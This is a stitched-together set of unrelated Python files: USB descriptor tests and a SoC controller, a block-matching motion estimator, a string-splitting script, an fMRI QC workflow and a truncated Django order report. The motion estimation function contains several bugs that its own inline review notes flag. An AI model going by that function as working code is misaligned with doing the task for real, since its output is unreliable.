            handshake, data = yield from self.get_descriptor(DescriptorTypes.STRING, index=i, length=255)
            self.assertEqual(handshake, USBPacketID.ACK)
            self.assertEqual(bytes(data), self.descriptors.get_descriptor_bytes(DescriptorTypes.STRING, index=i))

        # Set our configuration...
        status_pid = yield from self.set_configuration(1)
        self.assertEqual(status_pid, USBPacketID.DATA1)

        # ... and ensure it's applied.
        handshake, configuration = yield from self.get_configuration()
        self.assertEqual(handshake, USBPacketID.ACK)
        self.assertEqual(configuration, [1], "device did not accept configuration!")
class LongDescriptorTest(USBDeviceTest):
    """ :meta private: """

    # Simulate a complete USBDevice; clocking is handled by the test harness.
    FRAGMENT_UNDER_TEST = USBDevice
    FRAGMENT_ARGUMENTS  = {'handle_clocking': False}

    def initialize_signals(self):

        # Keep our device from resetting.
        yield self.utmi.line_state.eq(0b01)

        # Have our USB device connected.
        yield self.dut.connect.eq(1)

        # Pretend our PHY is always ready to accept data,
        # so we can move forward quickly.
        yield self.utmi.tx_ready.eq(1)

    def provision_dut(self, dut):
        self.descriptors = descriptors = DeviceDescriptorCollection()

        with descriptors.DeviceDescriptor() as d:
            d.idVendor           = 0x16d0
            d.idProduct          = 0xf3b

            d.iManufacturer      = "LUNA"
            d.iProduct           = "Test Device"
            d.iSerialNumber      = "1234"

            d.bNumConfigurations = 1

        # Provide a core configuration descriptor for testing.
        # Many endpoint descriptors make the configuration descriptor long,
        # so reads span multiple max-size packets.
        with descriptors.ConfigurationDescriptor() as c:

            with c.InterfaceDescriptor() as i:
                i.bInterfaceNumber = 0

                for n in range(15):

                    with i.EndpointDescriptor() as e:
                        e.bEndpointAddress = n
                        e.wMaxPacketSize   = 512

                    with i.EndpointDescriptor() as e:
                        e.bEndpointAddress = 0x80 | n
                        e.wMaxPacketSize   = 512

        dut.add_standard_control_endpoint(descriptors)

    @usb_domain_test_case
    def test_long_descriptor(self):
        descriptor = self.descriptors.get_descriptor_bytes(DescriptorTypes.CONFIGURATION)

        # Read our configuration descriptor (no subordinates).
        handshake, data = yield from self.get_descriptor(DescriptorTypes.CONFIGURATION, length=len(descriptor))
        self.assertEqual(handshake, USBPacketID.ACK)
        self.assertEqual(bytes(data), descriptor)
        self.assertEqual(len(data), len(descriptor))

    @usb_domain_test_case
    def test_descriptor_zlp(self):
        # Try requesting a long descriptor, but using a length that is a
        # multiple of the endpoint's maximum packet length. This should cause
        # the device to return some number of packets with the maximum packet
        # length, followed by a zero-length packet to terminate the
        # transaction.

        descriptor = self.descriptors.get_descriptor_bytes(DescriptorTypes.CONFIGURATION)

        # Try requesting a single and three max-sized packet.
        for factor in [1, 3]:
            request_length = self.max_packet_size_ep0 * factor
            handshake, data = yield from self.get_descriptor(DescriptorTypes.CONFIGURATION, length=request_length)

            self.assertEqual(handshake, USBPacketID.ACK)
            self.assertEqual(bytes(data), descriptor[0:request_length])
            self.assertEqual(len(data), request_length)
#
# Section that requires our CPU framework.
# We'll very deliberately section that off, so the rest of this module
# remains usable when the SoC framework isn't available.
#
# The SoC framework is optional; fall through gracefully if it isn't installed.
try:
    from ...soc.peripheral import Peripheral

    class USBDeviceController(Peripheral, Elaboratable):
        """ SoC controller for a USBDevice.

        Breaks our USBDevice control and status signals out into registers so a CPU / Wishbone master
        can control our USB device.

        The attributes below are intended to connect to a USBDevice. Typically, they'd be created by
        using the .controller() method on a USBDevice object, which will automatically connect all
        relevant signals.

        Attributes
        ----------
        connect: Signal(), output
            High when the USBDevice should be allowed to connect to a host.
        """

        def __init__(self):
            super().__init__()

            #
            # I/O port
            #
            self.connect   = Signal(reset=1)  # defaults to 'connected'
            self.bus_reset = Signal()

            #
            # Registers.
            #
            regs = self.csr_bank()
            self._connect = regs.csr(1, "rw", desc="""
                Set this bit to '1' to allow the associated USB device to connect to a host.
            """)

            self._speed = regs.csr(2, "r", desc="""
                Indicates the current speed of the USB device. 0 indicates High; 1 => Full,
                2 => Low, and 3 => SuperSpeed (incl SuperSpeed+).
            """)

            self._reset_irq = self.event(mode="rise", name="reset", desc="""
                Interrupt that occurs when a USB bus reset is received.
            """)

            # Wishbone connection.
            self._bridge = self.bridge(data_width=32, granularity=8, alignment=2)
            self.bus     = self._bridge.bus
            self.irq     = self._bridge.irq

        def attach(self, device: USBDevice):
            """ Returns a list of statements necessary to connect this to a USB controller.

            The returned values makes all of the connections necessary to provide control and fetch status
            from the relevant USB device. These can be made either combinationally or synchronously, but
            combinational is recommended; as these signals are typically fed from a register anyway.

            Parameters
            ----------
            device: USBDevice
                The :class:`USBDevice` object to be controlled.
            """
            return [
                device.connect      .eq(self.connect),
                self.bus_reset      .eq(device.reset_detected),
                self._speed.r_data  .eq(device.speed)
            ]

        def elaborate(self, platform):
            m = Module()
            m.submodules.bridge = self._bridge

            # Core connection register.
            m.d.comb += self.connect.eq(self._connect.r_data)
            with m.If(self._connect.w_stb):
                m.d.usb += self._connect.r_data.eq(self._connect.w_data)

            # Reset-detection event.
            m.d.comb += self._reset_irq.stb.eq(self.bus_reset)

            return m

except ImportError as e:
    # Since this exception happens so early, top_level_cli won't have set up logging yet,
    # so call the setup here to avoid getting stuck with Python's default config.
    configure_default_logging()
    logging.warning("SoC framework components could not be imported; some functionality will be unavailable.")
    logging.warning(e)
if __name__ == "__main__":
    # Run the simulation test cases defined above when executed directly.
    unittest.main()
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 23 10:59:47 2021
@author: anusk
"""
import cv2
import numpy as np
def HBMA(targetFrame, anchorFrame, blocksize, L):
    """Hierarchical block-matching motion estimation.

    Runs an exhaustive block search at the coarsest pyramid level, then
    refines the motion vectors level by level up to full resolution.

    Parameters
    ----------
    targetFrame, anchorFrame : 2-D grayscale arrays (same shape).
    blocksize : side length of the square matching blocks.
    L : number of pyramid levels (e.g. 3).

    Returns
    -------
    [predicted frame (uint8), [origin x, origin y] arrays, [dx, dy] arrays]

    NOTE(review): the original file had its indentation stripped; the block
    structure below is reconstructed from statement order and the matching
    second-pass code. Several suspected bugs are flagged inline.
    """
    anchorFrame = anchorFrame.astype('uint16')
    targetFrame = targetFrame.astype('uint16')
    predictFrame = np.zeros(anchorFrame.shape)
    accuracy = 1
    p = 16  # NOTE(review): unused.
    frameH, frameW = anchorFrame.shape
    accuracy = 1  # NOTE(review): duplicate assignment.
    rangs = np.array([-32, -32])   # search-range lower offsets
    rang6 = np.array([32, 32])     # search-range upper offsets
    m = 0
    factor = 2**(L-1)  # downsampling factor of the coarsest level
    # Tiny epsilon added to divisors below; factor >= 1 so it cannot be zero —
    # presumably kept to force float division. TODO confirm intent.
    e = 0.0000000000000000000001
    # Initial motion vectors.
    mv_x = 0
    mv_y = 0
    dx = []
    dy = []
    ox = []
    oy = []
    # NOTE(review): `error` is initialized once here and never reset per block
    # in the coarse search below (the refinement pass *does* reset it per
    # block) — this looks like a bug: a good match in an early block
    # suppresses updates in later blocks.
    error = 255*blocksize*blocksize*100
    # Upsample the anchor frame 2x with bilinear-style averaging.
    # NOTE(review): `upanchorframe` is never used afterwards.
    upanchorframe = np.zeros([frameH*2, frameW*2], dtype=np.uint16)
    upanchorframe[0:(frameH*2-1):2, 0:(frameW*2-1):2] = anchorFrame
    upanchorframe[0:(frameH*2-1):2, 1:(frameW*2-2):2] = (anchorFrame[:, 0:frameW-1]+anchorFrame[:, 1:frameW])/2
    upanchorframe[1:(frameH*2-2):2, 0:(frameW*2-1):2] = (anchorFrame[0:frameH-1, :]+anchorFrame[1:frameH, :])/2
    upanchorframe[1:(frameH*2-2):2, 1:(frameW*2-2):2] = (anchorFrame[0:frameH-1, 0:frameW-1] + anchorFrame[0:frameH-1, 1:frameW]+anchorFrame[1:frameH, 0:frameW-1]+anchorFrame[1:frameH, 1:frameW])/4
    # Build the downsampled pyramid (levels 1..3) by decimation.
    anchorDown1 = np.copy(anchorFrame)
    targetDown1 = np.copy(targetFrame)
    targetDown2 = np.zeros([int(frameH/2), int(frameW/2)], dtype=np.uint16)
    targetDown2[0:int(frameH/2), 0:int(frameW/2)] = targetFrame[0:frameH:2, 0:frameW:2]
    targetDown3 = np.zeros([int(frameH/4), int(frameW/4)], dtype=np.uint16)
    targetDown3[0:int(frameH/4), 0:int(frameW/4)] = targetDown2[0:int(frameH/2):2, 0:int(frameW/2):2]
    anchorDown2 = np.zeros([int(frameH/2), int(frameW/2)], dtype=np.uint16)
    anchorDown2[0:int(frameH/2), 0:int(frameW/2)] = anchorFrame[0:frameH:2, 0:frameW:2]
    anchorDown3 = np.zeros([int(frameH/4), int(frameW/4)], dtype=np.uint16)
    anchorDown3[0:int(frameH/4), 0:int(frameW/4)] = anchorDown2[0:int(frameH/2):2, 0:int(frameW/2):2]
    predictFrame = np.copy(anchorFrame)
    # Scale search ranges and frame dimensions down to the coarsest level.
    rangs = rangs/(factor+e)
    rang6 = rang6/(factor+e)
    frameH = int(frameH/(factor+e))
    frameW = int(frameW/(factor+e))
    rangestart = [0, 0]
    rangeEnd = [0, 0]
    # --- Coarse exhaustive search at the lowest-resolution level ---
    for i in range(0, frameH-blocksize+1, blocksize):
        rangestart[0] = int(i + rangs[0])
        rangeEnd[0] = int(i + blocksize + rang6[0])  # -1
        if rangestart[0] < 0:
            rangestart[0] = 0
        if rangeEnd[0] > frameH:
            rangeEnd[0] = frameH
        for j in range(0, frameW-blocksize+1, blocksize):
            rangestart[1] = int(j + rangs[1])
            rangeEnd[1] = int(j + blocksize + rang6[1])  # -1
            if rangestart[1] < 0:
                rangestart[1] = 0
            if rangeEnd[1] > frameW*accuracy:
                rangeEnd[1] = int(frameW*accuracy)
            # Signed copies so the SAD subtraction below can't wrap.
            # NOTE(review): these copies are loop-invariant and could be
            # hoisted out of both loops.
            tmpt = np.zeros(targetDown3.shape, dtype=np.int16)
            tmpa = np.zeros(targetDown3.shape, dtype=np.int16)
            tmpt[:, :] = targetDown3[:, :]
            tmpa[:, :] = anchorDown3[:, :]
            # EBMA SCRIPT
            anchorBlock = np.zeros([blocksize, blocksize], np.int16)
            anchorBlock = tmpa[i:i+blocksize, j:j+blocksize]
            for y in range(rangestart[0], rangeEnd[0]-blocksize+1):
                for x in range(rangestart[1], rangeEnd[1]-blocksize+1):
                    downtargetFrame = tmpt[y:y+accuracy*blocksize:accuracy, x:x+accuracy*blocksize:accuracy]
                    # Calculate SAD error for this candidate position.
                    temp_error = np.sum(np.absolute(anchorBlock - downtargetFrame))
                    if temp_error < error:
                        error = temp_error
                        # Grow dx/dy on demand so index m is always valid.
                        while len(dx) <= m:
                            dx.append(0)
                            dy.append(0)
                        mv_x = x/accuracy-j
                        mv_y = y/accuracy-i
                        dx[m] = mv_x
                        dy[m] = mv_y
                        # NOTE(review): origins are appended (and m advanced)
                        # on every *improvement*, not once per block — and the
                        # (x, y) order here is (j, i), the opposite of the
                        # refinement pass below. Verify against the caller.
                        ox.append(j)
                        oy.append(i)
                        m = m+1
    dy = np.asarray(dy)
    dx = np.asarray(dx)
    # --- Refinement passes: propagate vectors up the pyramid ---
    for ii in range(L-1, 0, -1):
        print(ii)
        dx = dx*2
        dy = dy*2
        frameH = frameH*2
        lineW = np.floor(frameW/blocksize)  # blocks per row at the previous level
        frameW = frameW*2
        ttt = dy.size - 1  # highest valid index into the coarse vectors
        m = 0
        dxx = []
        dyy = []
        for i in range(0, frameH-blocksize+1, blocksize):
            baseline = round(((i+1)/2)/blocksize) * lineW
            for j in range(0, frameW-blocksize+1, blocksize):
                # Index of the parent block's motion vector at the coarser level.
                mindx = int(np.floor(baseline + round(((j+1)/2)/blocksize)+1))
                if mindx > ttt:
                    mindx = ttt
                # Center the search window on the inherited vector.
                rangestart[0] = np.int16(i+dy[mindx]+rangs[0])
                rangeEnd[0] = np.int16(i+dy[mindx]+blocksize+rang6[0])
                if rangestart[0] < 0:
                    rangestart[0] = 0
                if rangeEnd[0] > frameH:
                    rangeEnd[0] = frameH
                rangestart[1] = np.int16(j + dx[mindx]+rangs[1])
                rangeEnd[1] = np.int16(j + dx[mindx] + blocksize + rang6[1])
                if rangestart[1] < 0:
                    rangestart[1] = 0
                if rangeEnd[1] > frameW*accuracy:
                    rangeEnd[1] = int(frameW*accuracy)
                # Select the pyramid level for this pass (level 2 or full res).
                if ii == 2:
                    tmpt = targetDown2[:, :]
                    tmpa = anchorDown2[:, :]
                if ii == 1:
                    tmpt = targetDown1[:, :]
                    tmpa = anchorDown1[:, :]
                tmpt = np.int16(tmpt)
                tmpa = np.int16(tmpa)
                anchorBlock = tmpa[i:i+blocksize, j:j+blocksize]
                mv_x = 0
                mv_y = 0
                error = 255*blocksize*blocksize*100  # reset per block (unlike pass 1)
                for y in range(rangestart[0], rangeEnd[0]-blocksize+1):
                    for x in range(rangestart[1], rangeEnd[1]-blocksize+1):
                        downtargetFrame = tmpt[y:y+accuracy*blocksize:accuracy, x:x+accuracy*blocksize:accuracy]
                        temp_error = np.sum(np.absolute(anchorBlock - downtargetFrame))
                        if temp_error < error:
                            error = temp_error
                            mv_x = x/accuracy-j
                            mv_y = y/accuracy-i
                while len(dxx) <= m:
                    dxx.append(0)
                    dyy.append(0)
                dxx[m] = mv_x
                dyy[m] = mv_y
                # NOTE(review): `downtargetFrame` is the *last* candidate
                # examined, not the best-scoring block — the prediction is
                # probably meant to use the block at (i+mv_y, j+mv_x).
                predictFrame[i:i+blocksize, j:j+blocksize] = downtargetFrame
                if m == 351:
                    print(m)  # NOTE(review): leftover debug trace?
                # NOTE(review): when len(ox) < m, ox[m] raises IndexError;
                # the condition was probably meant to be `len(ox) > m`.
                if len(ox) < m:
                    ox[m] = i
                    oy[m] = j
                else:
                    ox.append(i)
                    oy.append(j)
                m = m+1
        # Vectors of this pass feed the next (finer) level.
        dx = np.asarray(dxx)
        dy = np.asarray(dyy)
    mv_d = [dx, dy]
    mv_o = [np.array(ox), np.array(oy)]
    return [np.uint8(predictFrame), mv_o, mv_d]
if __name__ == "__main__":
    # Demo: estimate motion between two grayscale frames of the 'foreman'
    # sequence and display the motion-compensated prediction.
    anchorframe = cv2.imread('foremanY69.png', 0)  # 0 => load as grayscale
    targetframe = cv2.imread('foremanY72.png', 0)
    anchorframe = anchorframe.astype('uint16')
    targetframe = targetframe.astype('uint16')
    frameH, frameW = anchorframe.shape
    # 16x16 blocks, 3 pyramid levels.
    newFrame, origin, direction = HBMA(targetframe, anchorframe, 16, 3)
    cv2.imshow('new frame', newFrame)
    cv2.waitKey(0)
    cv2.destroyWindow('new frame')
def all_digits(text):
    """Return the digit characters of *text*, concatenated in original order."""
    # str.join avoids the quadratic cost of repeated string concatenation.
    return "".join(char for char in text if char.isdigit())
def all_letters(text):
    """Return the alphabetic characters of *text*, concatenated in original order."""
    # str.join avoids the quadratic cost of repeated string concatenation.
    return "".join(char for char in text if char.isalpha())
def all_other_characters(text):
    """Return the characters of *text* that are neither digits nor letters.

    Deliberately mirrors all_digits/all_letters by testing isdigit/isalpha
    (not isalnum, which also covers numeric characters like '½').
    """
    return "".join(char for char in text
                   if not char.isdigit() and not char.isalpha())
# Read one line and print its digits, letters, and remaining characters,
# each class on its own line.
text = input()
for extractor in (all_digits, all_letters, all_other_characters):
    print(extractor(text))
|
from confounds import wf_tissue_priors as tp
from confounds import wf_get_masks as gm
from nipype.interfaces.fsl import (FLIRT, FAST, ConvertXFM, ImageMaths, MultiImageMaths)
import nibabel as nib
import numpy as np
from nipype.pipeline import Node, Workflow
from nipype.interfaces.utility import IdentityInterface, Function
# Main Workflow that connects two workflows
# Main Workflow that connects two workflows
def get_wf_main(name='wf_main'):
    """Build the main workflow connecting the tissue-priors and tissue-masks
    sub-workflows, plus a QC node comparing their outputs.

    Parameters
    ----------
    name : str
        Name of the returned nipype Workflow.

    Returns
    -------
    nipype Workflow with `inputspec` / `outputspec` identity nodes; the
    `outputspec.qc_stats_dict` output carries the overlap statistics.
    """
    wf_main = Workflow(name=name)

    # External inputs shared by both sub-workflows.
    inputspec = Node(IdentityInterface(fields=['resampled_anat_file_path',
                                               'func2anat_mat_path', 'reference_func_file_path',
                                               'csf_tissue_prior_path', 'wm_tissue_prior_path',
                                               'threshold', 'std2func_mat_path', 'brain_mask_eroded']),
                     name="inputspec")

    outputspec = Node(IdentityInterface(fields=['csf_tissue_prior_path', 'wm_tissue_prior_path', 'qc_stats_dict']),
                      name="outputspec")

    tissue_priors = tp.get_wf_tissue_priors(name='wf_tissue_priors')
    tissue_masks = gm.get_wf_tissue_masks(name='wf_tissue_masks')

    def compute_qc_stats(anat_file_path, csf_mask, csf_prior, wm_mask, wm_prior):
        """Compute voxel-overlap statistics between tissue priors (A) and
        tissue masks (B) for CSF and WM.

        Runs inside a nipype Function node, so all imports are local.
        Returns an OrderedDict of single-element lists (one table row).
        """
        import numpy as np
        import nibabel as nib
        from collections import OrderedDict as od

        # NOTE(review): nibabel's get_data() is deprecated in favor of
        # get_fdata(); left unchanged because get_fdata() alters the dtype.
        csf_prior_data = nib.load(csf_prior).get_data()
        wm_prior_data = nib.load(wm_prior).get_data()
        csf_mask_data = nib.load(csf_mask).get_data()
        wm_mask_data = nib.load(wm_mask).get_data()

        # A: prior volumes
        voxels_count_csf_prior = len((np.where(csf_prior_data == 1))[0])
        voxels_count_wm_prior = len((np.where(wm_prior_data == 1))[0])
        # B: mask volumes
        voxels_count_csf_mask = len((np.where(csf_mask_data == 1))[0])
        voxels_count_wm_mask = len((np.where(wm_mask_data == 1))[0])
        # A - B: voxels only in the prior
        A_minus_B_csf = len(np.where((csf_prior_data - csf_mask_data) == 1)[0])
        A_minus_B_wm = len(np.where((wm_prior_data - wm_mask_data) == 1)[0])
        # B - A: voxels only in the mask
        B_minus_A_csf = len(np.where((csf_prior_data - csf_mask_data) == -1)[0])
        B_minus_A_wm = len(np.where((wm_prior_data - wm_mask_data) == -1)[0])
        # A U B: union
        A_union_B_csf = len(np.where((csf_prior_data + csf_mask_data) != 0)[0])
        A_union_B_wm = len(np.where((wm_prior_data + wm_mask_data) != 0)[0])
        # A I B: intersection
        A_intersection_B_csf = len(np.where((csf_prior_data * csf_mask_data) == 1)[0])
        A_intersection_B_wm = len(np.where((wm_prior_data * wm_mask_data) == 1)[0])

        print('voxels_count_csf_prior ', voxels_count_csf_prior)
        print('voxels_count_wm_prior ', voxels_count_wm_prior)
        print('voxels_count_csf_mask ', voxels_count_csf_mask)
        print('voxels_count_wm_mask ', voxels_count_wm_mask)
        print('prior_minus_mask_csf ', A_minus_B_csf)
        print('prior_minus_mask_wm ', A_minus_B_wm)
        print('mask_minus_prior_csf ', B_minus_A_csf)
        print('mask_minus_prior_wm ', B_minus_A_wm)
        print('prior_union_mask_csf ', A_union_B_csf)
        print('prior_union_mask_wm ', A_union_B_wm)
        print('prior_intersection_mask_csf ', A_intersection_B_csf)
        print('prior_intersection_mask_wm ', A_intersection_B_wm)

        # Jaccard-style overlap quality: |A I B| / |A U B|.
        quality_csf = A_intersection_B_csf/A_union_B_csf
        quality_wm = A_intersection_B_wm/A_union_B_wm
        print('quality_csf ', quality_csf)
        print('quality_wm ', quality_wm)

        # A : Prior and B : Mask
        print('Anat File path ', anat_file_path)
        # Assumes a BIDS-style filename 'sub-<id>_...' — TODO confirm upstream.
        sub_id = anat_file_path.split('/')[-1].split('_')[0].split('-')[1]
        print('Sub ID ', sub_id)

        # Renamed from `dict` to avoid shadowing the builtin.
        stats = od()
        stats['sub_id'] = [sub_id]
        stats['voxels_count_csf_prior'] = [voxels_count_csf_prior]
        stats['voxels_count_wm_prior'] = [voxels_count_wm_prior]
        stats['voxels_count_csf_mask'] = [voxels_count_csf_mask]
        stats['voxels_count_wm_mask'] = [voxels_count_wm_mask]
        stats['prior_minus_mask_csf'] = [A_minus_B_csf]
        stats['prior_minus_mask_wm'] = [A_minus_B_wm]
        stats['mask_minus_prior_csf'] = [B_minus_A_csf]
        stats['mask_minus_prior_wm'] = [B_minus_A_wm]
        stats['prior_union_mask_csf'] = [A_union_B_csf]
        stats['prior_union_mask_wm'] = [A_union_B_wm]
        stats['prior_intersection_mask_csf'] = [A_intersection_B_csf]
        stats['prior_intersection_mask_wm'] = [A_intersection_B_wm]
        stats['quality_csf'] = [quality_csf]
        stats['quality_wm'] = [quality_wm]
        return stats

    # The node's output is still named 'dict' to keep downstream connections working.
    qc_stats = Node(Function(function=compute_qc_stats, input_names=['anat_file_path',
                                                                     'csf_mask', 'csf_prior', 'wm_mask', 'wm_prior'],
                             output_names=['dict']), name='qc_stats')

    # Wire the priors sub-workflow.
    wf_main.connect(inputspec, 'csf_tissue_prior_path', tissue_priors, 'inputspec.csf_tissue_prior_path')
    wf_main.connect(inputspec, 'wm_tissue_prior_path', tissue_priors, 'inputspec.wm_tissue_prior_path')
    wf_main.connect(inputspec, 'threshold', tissue_priors, 'inputspec.threshold')
    wf_main.connect(inputspec, 'reference_func_file_path', tissue_priors, 'inputspec.reference_func_file_path')
    wf_main.connect(inputspec, 'std2func_mat_path', tissue_priors, 'inputspec.std2func_mat_path')
    wf_main.connect(tissue_priors, 'outputspec.csf_tissue_prior_path', outputspec, 'csf_tissue_prior_path')
    wf_main.connect(tissue_priors, 'outputspec.wm_tissue_prior_path', outputspec, 'wm_tissue_prior_path')

    # Wire the masks sub-workflow.
    wf_main.connect(inputspec, 'resampled_anat_file_path', tissue_masks, 'inputspec.resampled_anat_file_path')
    wf_main.connect(inputspec, 'reference_func_file_path', tissue_masks, 'inputspec.reference_func_file_path')
    wf_main.connect(inputspec, 'func2anat_mat_path', tissue_masks, 'inputspec.func2anat_mat_path')
    wf_main.connect(inputspec, 'std2func_mat_path', tissue_masks, 'inputspec.std2func_mat_path')
    wf_main.connect(inputspec, 'brain_mask_eroded', tissue_masks, 'inputspec.brain_mask_eroded')
    wf_main.connect(inputspec, 'threshold', tissue_masks, 'inputspec.threshold')

    # wf_main.connect(tissue_masks, 'outputspec.csf_mask', outputspec,'csf_mask')
    # wf_main.connect(tissue_masks, 'outputspec.wm_mask', outputspec,'wm_mask')

    # Feed both sub-workflows' outputs into the QC node.
    wf_main.connect(tissue_priors, 'outputspec.csf_tissue_prior_path', qc_stats, 'csf_prior')
    wf_main.connect(tissue_priors, 'outputspec.wm_tissue_prior_path', qc_stats, 'wm_prior')
    wf_main.connect(tissue_masks, 'outputspec.csf_mask', qc_stats, 'csf_mask')
    wf_main.connect(tissue_masks, 'outputspec.wm_mask', qc_stats, 'wm_mask')
    wf_main.connect(inputspec, 'resampled_anat_file_path', qc_stats, 'anat_file_path')
    wf_main.connect(qc_stats, 'dict', outputspec, 'qc_stats_dict')

    return wf_main
# --------------------------------------------------------------------------------------------------------------
if __name__ == "__main__":
    # Ad-hoc smoke test: build the main workflow and run it with hard-coded
    # inputs for ABIDE-I subject 0050002 on a specific local filesystem.
    # NOTE(review): paths below are machine-specific and will not resolve
    # elsewhere — parameterize before reuse.
    wf_main = get_wf_main(name='wf_main')
    wf_main.inputs.inputspec.resampled_anat_file_path = \
    '/mnt/project1/home1/varunk/fMRI/testScripts/_subject_id_0050002/resample_anat/sub-0050002_T1w_brain_resample.nii'
    wf_main.inputs.inputspec.reference_func_file_path = \
    '/mnt/project1/home1/varunk/fMRI/testScripts/func_subject_id_0050002/applyMask/sub-0050002_task-rest_run-1_bold_roi_st_mcf.nii_brain.nii.gz'
    wf_main.inputs.inputspec.func2anat_mat_path = \
    '/mnt/project1/home1/varunk/fMRI/results/resultsABIDE1/preprocess/'+\
    'motion_correction_bet/coreg_reg/_subject_id_0050002/func2anat_reg/'+\
    'sub-0050002_task-rest_run-1_bold_roi_st_mcf_mean_bet_flirt.mat'
    wf_main.inputs.inputspec.std2func_mat_path = \
    '/mnt/project1/home1/varunk/fMRI/results/resultsABIDE1/preprocess/'+\
    'motion_correction_bet/coreg_reg/atlas_resize_reg_directory/_subject_id_0050002/'+\
    'std2func_xform/fullbrain_atlas_thr0-2mm_resample_flirt.mat'
    # wf_tissue_masks.inputs.inputspec.tissue_prior_csf_path = '/mnt/project1/home1/varunk/fMRI/testScripts/results/wf_tissue_priors/threshold_csf/avg152T1_csf_resample_thresh.nii.gz'
    # wf_tissue_masks.inputs.inputspec.tissue_prior_wm_path = '/mnt/project1/home1/varunk/fMRI/testScripts/results/wf_tissue_priors/threshold_wm/avg152T1_white_resample_thresh.nii.gz'
    wf_main.inputs.inputspec.brain_mask_eroded = \
    '/mnt/project1/home1/varunk/fMRI/Autism-Connectome-Analysis/tissuepriors/brain_mask_2mm_eroded_18mm.nii.gz'
    # Probability threshold used when binarizing the tissue priors/masks.
    wf_main.inputs.inputspec.threshold = 0.5
    wf_main.inputs.inputspec.csf_tissue_prior_path =\
    '/mnt/project1/home1/varunk/fMRI/Autism-Connectome-Analysis/tissuepriors/avg152T1_csf.nii.gz'
    wf_main.inputs.inputspec.wm_tissue_prior_path =\
    '/mnt/project1/home1/varunk/fMRI/Autism-Connectome-Analysis/tissuepriors/avg152T1_white.nii.gz'
    wf_main.base_dir = 'results/'
    # Send nipype crash dumps to a scratch directory instead of the CWD.
    TEMP_DIR_FOR_STORAGE = 'crash_files/'
    wf_main.config = {"execution": {"crashdump_dir": TEMP_DIR_FOR_STORAGE}}
    wf_main.write_graph(graph2use='flat', format='png', simple_form=True)
    out = wf_main.run()
|
# coding=utf-8
from django.core.management.base import BaseCommand, CommandError
from deliver import send_email
from mulan.models import Contact, OrderHistory, Setting
import datetime as dt
import re
import sms24x7
def pp(p):
    """Pretty-print one report cell.

    Tuples render as "count (percent%)", zero renders as a dash, and any
    other value is passed through unicode().  NOTE: Python 2 only
    (``unicode`` builtin).
    """
    # isinstance() instead of `type(p) is tuple` — idiomatic and also
    # accepts tuple subclasses (e.g. namedtuples).
    if isinstance(p, tuple):
        return unicode(p[0]) + u" (" + unicode(p[1]) + u"%)"
    if p == 0:
        # Zero counts are shown as a dash so empty columns read cleanly.
        return u"-"
    return unicode(p)
def generate_delivery_report_plain(orders):
    """Plain-text fallback body shown by mail clients that cannot render HTML."""
    fallback_text = u"Ваш почтовый клиент не поддерживает HTML-форматирование! Смените его!"
    return fallback_text
def generate_delivery_report_html(orders, period):
    """Build the HTML delivery report for *orders* over *period*.

    *orders* is a Django queryset of OrderHistory rows; *period* is a
    [start_date, end_date] pair (inclusive).  Statistics are broken down
    into four columns: all orders, menu orders, business-lunch ("bl")
    orders and combined orders.
    NOTE(review): Python 2 only code (``unicode`` builtin, ``dict.has_key``).
    """
    # Partition the queryset by order type.
    orders_menu = [order for order in orders if order.is_menu_order()]
    orders_bl = [order for order in orders if order.is_bl_order()]
    orders_combined = [order for order in orders if order.is_combined_order()]
    orders_count = orders.count()
    orders_menu_count = len(orders_menu)
    orders_bl_count = len(orders_bl)
    orders_combined_count = len(orders_combined)
    # The counters below start as ints and are later replaced by
    # (count, percent) tuples when non-zero; pp() renders both forms.
    orders_regular_guests = 0
    orders_menu_regular_guests = 0
    orders_bl_regular_guests = 0
    orders_combined_regular_guests =0
    orders_occasional_visitors = 0
    orders_menu_occasional_visitors = 0
    orders_bl_occasional_visitors = 0
    orders_combined_occasional_visitors = 0
    # Tally orders per guest; a guest is identified by the phone number
    # with all non-digits stripped and a leading '+' replaced by '8'.
    orders_map = {}
    for order in orders:
        if order.is_menu_order():
            type_order = 'menu'
        elif order.is_bl_order():
            type_order = 'bl'
        else:
            type_order = 'combined'
        p = re.compile('[^+\d]')
        p2 = re.compile('^\+')
        guest_uid = p2.sub('8', p.sub('', order.original_order.phoneNo))
        if orders_map.has_key(guest_uid):
            val = orders_map[guest_uid]
        else:
            val = {'total':0, 'menu':0, 'bl':0, 'combined':0}
        val['total'] = val['total'] + 1
        val[type_order] = val[type_order] + 1
        orders_map[guest_uid] = val
    # A guest with more than one order in the period is "regular";
    # otherwise "occasional".
    for guest_uid in orders_map.keys():
        if orders_map[guest_uid]['total'] > 1:
            orders_regular_guests += orders_map[guest_uid]['total']
        else:
            orders_occasional_visitors += orders_map[guest_uid]['total']
        if orders_map[guest_uid]['total'] > 1:
            orders_menu_regular_guests += orders_map[guest_uid]['menu']
        else:
            orders_menu_occasional_visitors += orders_map[guest_uid]['menu']
        if orders_map[guest_uid]['total'] > 1:
            orders_bl_regular_guests += orders_map[guest_uid]['bl']
        else:
            orders_bl_occasional_visitors += orders_map[guest_uid]['bl']
        if orders_map[guest_uid]['total'] > 1:
            orders_combined_regular_guests += orders_map[guest_uid]['combined']
        else:
            orders_combined_occasional_visitors += orders_map[guest_uid]['combined']
    # Replace non-zero counters with (count, percent-of-column) tuples.
    if orders_regular_guests > 0:
        orders_regular_guests = (orders_regular_guests, int(round(float(orders_regular_guests) / orders_count * 100)))
    if orders_menu_regular_guests > 0:
        orders_menu_regular_guests = (orders_menu_regular_guests, int(round(float(orders_menu_regular_guests) / orders_menu_count * 100)))
    if orders_bl_regular_guests > 0:
        orders_bl_regular_guests = (orders_bl_regular_guests, int(round(float(orders_bl_regular_guests) / orders_bl_count * 100)))
    if orders_combined_regular_guests > 0:
        orders_combined_regular_guests = (orders_combined_regular_guests, int(round(float(orders_combined_regular_guests) / orders_combined_count * 100)))
    if orders_occasional_visitors > 0:
        orders_occasional_visitors = (orders_occasional_visitors, int(round(float(orders_occasional_visitors) / orders_count * 100)))
    if orders_menu_occasional_visitors > 0:
        orders_menu_occasional_visitors = (orders_menu_occasional_visitors, int(round(float(orders_menu_occasional_visitors) / orders_menu_count * 100)))
    if orders_bl_occasional_visitors > 0:
        orders_bl_occasional_visitors = (orders_bl_occasional_visitors, int(round(float(orders_bl_occasional_visitors) / orders_bl_count * 100)))
    if orders_combined_occasional_visitors > 0:
        orders_combined_occasional_visitors = (orders_combined_occasional_visitors, int(round(float(orders_combined_occasional_visitors) / orders_combined_count * 100)))
    # Revenue and order-position totals per column.
    orders_money = sum([o.money for o in orders])
